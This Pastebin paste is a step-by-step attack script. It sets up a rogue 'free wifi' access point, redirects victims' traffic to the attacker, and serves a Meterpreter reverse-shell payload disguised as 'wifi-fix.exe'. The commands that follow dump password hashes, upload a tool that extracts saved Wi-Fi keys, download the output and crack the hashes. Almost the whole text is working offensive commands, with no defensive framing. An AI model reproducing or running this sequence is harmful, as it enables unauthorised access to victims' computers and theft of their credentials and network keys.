Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Non Transparent - Target cant get on the internet
- #Fake AP: wlan1
- #Targets IP Address: 10.0.0.20
- #**************************************************** Setup Fake AP ********
- modprobe tun
- airbase-ng -P -C 30 -e "free wifi" wlan1 -v
- #******************************************* Non Transparent Airbase ********
- ifconfig at0 up
- ifconfig lo up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
- iptables -P FORWARD ACCEPT
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- #************************************************ Setup DHCP Server ********
- dhcpd3 -d -f -cf /etc/dhcpd.conf at0
- #************************************** Force them to go to our site ********
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- # cd /pentest/misc/dnspentest
- # java ServerKernelMain 10.0.0.1 10.0.0.1
- #************************************************** Start Web Server ********
- sh -c "start-apache"
- #**************************************************** Get exploit ready ********
- cd /pentest/exploits/framework3
- #./msfconsole
- #use exploit/multi/handler
- #set PAYLOAD windows/meterpreter/reverse_tcp
- #set LHOST 10.0.0.1
- #set LPORT 55555
- #show options
- #exploit
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/wifi-fix.exe
- ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 E
- #*************************************** Check that Target connected ********
- arp -n -v -i at0
- ping 10.0.0.20
- #***************************************************** Metasploit fun ********
- session -l
- sysinfo
- getuid
- use priv
- hashdump
- session -i 1
- #***************************************************** Steal wifi info ********
- mkdir c://g0tmi1k
- mkdir c://g0tmi1k//wkviewer
- cd C:/g0tmi1k/wkviewer4
- upload /root/tools/wkviewer/wkv.exe c://g0tmi1k//wkviewer4
- upload /root/tools/wkviewer/wkv32.exe c://g0tmi1k//wkviewer4
- #upload /root/tools/wkviewer/wkv64.exe c://g0tmi1k//wkviewer4
- #upload /root/tools/wkviewer/wkv.bat c://g0tmi1k//wkviewer4
- #upload /root/tools/wkviewer/metsvc-server.exe c://g0tmi1k//wkviewer4
- #upload /root/tools/wkviewer/metsrv.dll c://g0tmi1k//wkviewer4
- #upload /root/tools/wkviewer/metsvc.exe c://g0tmi1k//wkviewer4
- execute -H -f wkv.bat
- cat wkv.txt
- download wkv.txt /root/wkv.txt
- #***************************************************** Crack Hashes ********
- exit
- cd /pentest/passwords/jtr/
- ./john /root/HASH.txt
- rm -r /root/HASH.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement